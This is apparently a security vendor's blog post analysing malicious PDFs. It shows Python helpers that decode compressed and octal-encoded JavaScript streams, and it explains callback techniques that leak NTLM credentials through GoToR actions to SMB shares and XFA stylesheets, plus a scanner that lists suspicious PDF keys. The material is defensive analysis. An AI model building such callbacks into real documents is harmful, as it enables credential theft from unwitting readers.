Malicious PDFs | Revealing the Techniques Behind the Attacks

Most of us are no strangers to phishing attempts, and over the years we’ve kept you informed about the latest tricks used by attackers in the epidemic of phishing and spear-phishing campaigns that plague, in particular, email users. Like other files that can come as attachments or links in an email, PDF files have received their fair share of attention from threat actors, too. In this post, we’ll take you on a tour of the technical aspects behind malicious PDF files: what they are, how they work, and how we can protect ourselves from them.

How Do PDF Files Execute Code?

Regular readers of the SentinelOne blog will be familiar with the idea of malicious Office attachments that run VBA code from Macros or use DDE to deliver attacks, but not so well-known is how PDFs can execute code.

In some kinds of malicious PDF attacks, the PDF reader itself contains a vulnerability or flaw that allows a file to execute malicious code. Remember that PDF readers aren’t just applications like Adobe Reader and Adobe Acrobat. Most browsers contain a built-in PDF reader engine that can also be targeted. In other cases, attackers might leverage AcroForms or XFA Forms, scripting technologies used in PDF creation that were intended to add useful, interactive features to a standard PDF document.

“One of the easiest and most powerful ways to customize PDF files is by using JavaScript.” (Adobe)

To get a better understanding of how such attacks work, let’s look at a typical PDF file structure. We can safely open a PDF file in a plain text editor to inspect its contents. At first glance, it might look indecipherable:

Image of obfuscated javascript

However, with a bit of knowledge of PDF file structure, we can start to see how to decode this without too much trouble. The body or contents of a PDF file are listed as numbered “objects”. These begin with the object’s index number, a generation number and the “obj” keyword, as we can see at lines 3 and 19, which show the start of the definitions for the first two objects in the file:

1 0 obj
2 0 obj

The end of each object is signalled with the keyword endobj , as seen at lines 18 and 24 for Object 1 and Object 2, respectively.
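To make the object layout concrete, here is a minimal sketch in Python that lists the objects in a PDF's raw bytes by matching the "obj" and "endobj" keywords. The sample bytes and the `list_objects` helper are hypothetical, written for illustration only; they are not taken from the file in the screenshot.

```python
import re

# Matches "<index> <generation> obj ... endobj"; DOTALL lets "." span newlines.
OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\b(.*?)\bendobj", re.DOTALL)


def list_objects(pdf_bytes: bytes):
    """Return (index, generation, body) for each object found in the raw bytes."""
    return [
        (int(m.group(1)), int(m.group(2)), m.group(3).strip())
        for m in OBJ_RE.finditer(pdf_bytes)
    ]


# Hypothetical stand-in for a small PDF body (not a complete, valid PDF).
sample = b"""%PDF-1.4
1 0 obj
<< /Length 5 >>
stream
hello
endstream
endobj
2 0 obj
<< /JS 1 0 R >>
endobj
"""

objects = list_objects(sample)
for index, generation, body in objects:
    print(index, generation, len(body), "bytes")
```

A regex pass like this is only a rough aid for manual inspection. It can be fooled by binary stream data that happens to contain the keyword "endobj", and it does not see objects packed inside compressed object streams.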

Object 2 immediately offers us some clues. We can see that it contains a dictionary (signalled by the double chevrons << and >>). The dictionary has an entry for a JavaScript stream and a reference to Object 1:

This tells us that the “garbage” code in Object 1 between the keywords stream (line 8) and endstream (line 15) is actually a JavaScript stream. Even better, Object 1’s dictionary is kind enough to tell us how to decode it. Line 6 specifies a “filter” of value “FlateDecode”. We can now write a quick-and-dirty Python script that decompresses the stream into plain JavaScript:

Image of decoding with python
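The script is only shown as a screenshot, so what follows is a minimal sketch of the same idea rather than the exact code in the image. It assumes the stream uses a single FlateDecode filter, which is zlib/deflate compression. The `inflate_streams` helper and the sample object, including the example.invalid URL, are hypothetical.

```python
import re
import zlib

# Capture the bytes between "stream" and "endstream"; the lookbehind stops
# the "stream" inside "endstream" from being treated as a start marker.
STREAM_RE = re.compile(rb"(?<!end)stream\r?\n(.*?)endstream", re.DOTALL)


def inflate_streams(pdf_bytes: bytes):
    """Return the decompressed contents of every Flate-compressed stream."""
    results = []
    for match in STREAM_RE.finditer(pdf_bytes):
        try:
            # decompressobj tolerates the trailing newline before "endstream".
            results.append(zlib.decompressobj().decompress(match.group(1)))
        except zlib.error:
            # Not zlib data (uncompressed or a different filter); skip it.
            continue
    return results


# Build a tiny stand-in object with a compressed JavaScript stream.
js = b'this.submitForm("http://example.invalid/");'
compressed = zlib.compress(js)
sample = (
    b"1 0 obj\n<< /Filter /FlateDecode /Length %d >>\nstream\n" % len(compressed)
    + compressed
    + b"\nendstream\nendobj\n"
)

for script in inflate_streams(sample):
    print(script.decode("latin-1"))
```

For a real file, you would read the bytes with `open(path, "rb").read()` and pass them to `inflate_streams`. Streams that chain several filters, or that use predictors, need more work than this sketch does.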

Cleaning Up the Code

Our Python script churns out the JavaScript perfectly but not exactly beautifully:

Image of decoded but unformatted JS

As we’ve pointed out before, one thing you need to get used to when doing this kind of work is tidying up code to make it easier to work on. Here’s the same code after running it through a beautifier or prettifier in Sublime Text:

Image of prettified JS

Now we can read the JavaScript and determine if it’s malicious or not. In this case, the code appears to be contacting a domain called “readnotify.com”. Making callbacks (“phoning home”) without user consent shows at least a lack of concern for user privacy. For people working in journalism or in politically-sensitive areas this could be a serious issue, as this kind of callback can reveal the user’s IP address, operating system and browser version to a remote server.

More Malicious JavaScript

Compressed streams aren’t the only way PDF files can contain obfuscated code. Here’s another file, one that looks more worrying when we check its hash on VirusTotal:

Image of CVE 2018 4993 on VirusTotal


As the image from VT makes clear, this is some kind of trojan that’s exploiting CVE-2018-4993. Let’s open it up and take a look inside.

Image of octal encoded JavaScript

This is a very small file. There are only four objects, but the one that interests us is Object 3 and the value for the dictionary key /AA. Note that this contains a child dictionary with key name /O. That’s important because the /O key specifies actions that should occur when a document is opened. The value of this key is itself another dictionary containing /JS, indicating yet again some encoded JavaScript.

Unlike our previous file, however, this one does not specify a filter. Luckily, the value of “JS” is clearly recognisable as octal encoding. Octal (or “oct”) uses three digits between 0 and 7 to specify a single value. The best thing about oct is we don’t need to roll up our Python sleeves to interpret it; we can just print it out directly on the command line:

Image of printing octal encoded JS

As printf shows, the octals represent the same kind of JavaScript call that we saw in the previous example, leveraging the this.submitForm() function.
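If you would rather stay in Python than use printf, the same decoding can be sketched in a few lines. This assumes the string uses backslash-octal escapes of up to three digits, as in the example above. The `decode_pdf_octal` helper and the short encoded sample are hypothetical and are not the actual payload from the file.

```python
import re


def decode_pdf_octal(raw: str) -> str:
    """Replace each backslash-octal escape (e.g. \\164) with its character."""
    return re.sub(r"\\([0-7]{1,3})", lambda m: chr(int(m.group(1), 8)), raw)


# Hypothetical sample: an octal-escaped fragment, written as a raw string
# so that Python leaves the backslashes alone.
encoded = r"\164\150\151\163\056\163\165\142\155\151\164\106\157\162\155"
decoded = decode_pdf_octal(encoded)
print(decoded)
```

Characters that are not escaped pass through unchanged, so the helper can be run over a whole /JS value that mixes plain and octal-encoded text.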

Image of beautified JavaScript

Going back to the /AA dictionary in the PDF, note the two lines which specify

This code issues the “Go To Remote” action, telling the reader application to jump to the destination specified under the /F key.

Stealing Credentials with an SMB Attack

We can use cURL to grab the headers from that IP address to see what we can learn.

Image of using curl to get header info

Looks like we need some authentication to get past the server, and that’s exactly where the danger lies for Windows users. If the attacker has set up the remote file as an SMB share, then the crafted PDF’s attempt to jump to that location will cause an exchange between the user’s machine and the attacker’s server in which the user’s NTLM credentials are leaked.

This happens because when a user tries to access SMB shared files, Windows sends the user name and a hashed password to automatically try to log in. Although the hashed password is not the user’s actual password, the leaked credentials can be used to set up SMB Relay attacks. If the password is not particularly strong, automated password-cracking tools can also recover the plain-text version from the hash with little effort.

Let’s see what VT makes of the IP address.

Image of malicious url detection

This host has a reputation as malicious, so there’s a good chance that this PDF file is, as suspected, trying to capture the user’s NTLM credentials.


Another Day, Another Callback

In January this year, another kind of callback flaw was spotted in XFA forms. XFA (also known as “Adobe LiveCycle”) was introduced by Adobe in PDF v1.5 and allows PDFs to dynamically resize fields within a document, among other things. Unfortunately, XFA also lends itself to misuse. As explained in this POC, a stream can contain an xml-stylesheet that can also be used to initiate a direct connection to a remote server or SMB share.

Image of xfa callback

In this stream, the reader will parse the URL and immediately attempt a connection. Although there are no known cases of this method being used in the wild to date, the researcher tested it against Adobe Acrobat Reader DC, version 19.010.20069.
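When reviewing a decoded XFA stream by hand, it can help to pull out any stylesheet targets automatically. The sketch below assumes the stream has already been decompressed to text and that the target sits in the href attribute of an xml-stylesheet processing instruction. The `stylesheet_targets` helper and the sample XML (using a documentation-range IP address) are hypothetical, not the contents of the POC.

```python
import re

# Find the href value inside an <?xml-stylesheet ... ?> processing instruction.
STYLESHEET_RE = re.compile(
    r"<\?xml-stylesheet\b[^?]*?\bhref\s*=\s*[\"']([^\"']+)[\"']",
    re.IGNORECASE,
)


def stylesheet_targets(xfa_xml: str):
    """Return every href referenced by an xml-stylesheet instruction."""
    return STYLESHEET_RE.findall(xfa_xml)


# Hypothetical decoded XFA stream pointing at a remote SMB share.
sample = (
    '<?xml version="1.0"?>\n'
    r'<?xml-stylesheet type="text/xsl" href="\\192.0.2.10\share\style.xsl"?>'
    '\n<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/"/>'
)

targets = stylesheet_targets(sample)
for target in targets:
    print(target)
```

Any target that is a UNC path or an unfamiliar remote URL is worth a closer look, for the same NTLM-leak reasons described earlier.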

Protecting Against PDF Attacks

It’s impossible to tell whether a PDF file contains a credential-stealing callback or malicious JavaScript before opening it, unless you actually inspect it in the ways we’ve shown here. Of course, for most users and most use cases, that’s not a practical solution.
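For analysts who do want a quick first pass, part of that inspection can be automated. The following is a rough triage sketch that counts dictionary keys commonly associated with scripts and automatic actions. The key list is our own assumption (it includes the /AA, /JS and /GoToR names discussed above plus a few related standard names), and the `triage` helper and sample bytes are hypothetical.

```python
import re

# Names worth a second look; an assumed, non-exhaustive list.
SUSPICIOUS_KEYS = (
    b"/JS", b"/JavaScript", b"/AA", b"/OpenAction",
    b"/GoToR", b"/SubmitForm", b"/XFA",
)


def triage(pdf_bytes: bytes) -> dict:
    """Count occurrences of each suspicious name in the raw PDF bytes."""
    counts = {}
    for key in SUSPICIOUS_KEYS:
        # The lookahead stops /JS from matching a longer name such as /JSFoo.
        pattern = re.escape(key) + rb"(?![A-Za-z0-9])"
        counts[key.decode()] = len(re.findall(pattern, pdf_bytes))
    return counts


# Hypothetical object with an open action that runs JavaScript.
sample = (
    b"3 0 obj\n"
    b"<< /AA << /O << /S /JavaScript /JS (app.alert\\(1\\)) >> >> >>\n"
    b"endobj\n"
)

counts = triage(sample)
for name, count in counts.items():
    if count:
        print(name, count)
```

A zero count does not prove a file is clean. Names can be hidden inside compressed object streams or written with hex escapes, so treat this only as a way to decide which files deserve manual inspection first.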

There are, however, a couple of things you can do on the user-side. Most readers and browsers will have some form of JavaScript control. In Adobe’s Acrobat Reader DC, for example, you can disable Acrobat JavaScript in the Preferences and manage access to URLs. Similarly, with a bit of effort, users can also customize how Windows handles NTLM.

While these mitigations are “nice to have” and certainly worth considering, bear in mind that these features were added, just like MS Office Macros, to improve usability and productivity. Therefore, be sure that you’re not disabling some functionality that is an important part of your own or your organization’s workflow.

For enterprise situations, you should ensure you have a good EDR security solution that offers both full visibility into your network traffic, including encrypted communications, and comprehensive firewall control. These days, behavioral AI detection is a must-have to properly protect your network and assets from all attacks, including malicious PDFs. SentinelOne customers can, in addition, scan PDF documents before they are accessed with our Nexus Embedded SDK.

Conclusion

Leveraging malicious PDFs is a great tactic for threat actors as there’s no way for the user to be aware of what code the PDF runs as it opens. Both the file format and file readers have a long history of exposed and, later, patched flaws. Because of the useful, dynamic features included in the document format, it’s reasonable to assume further flaws will be exposed and exploited by adversaries. With the ever-increasing tide of phishing and social engineering tactics targeting users, it’s vital that you remain vigilant about the dangers of PDFs and deploy a Next Gen security solution to prevent attacks.
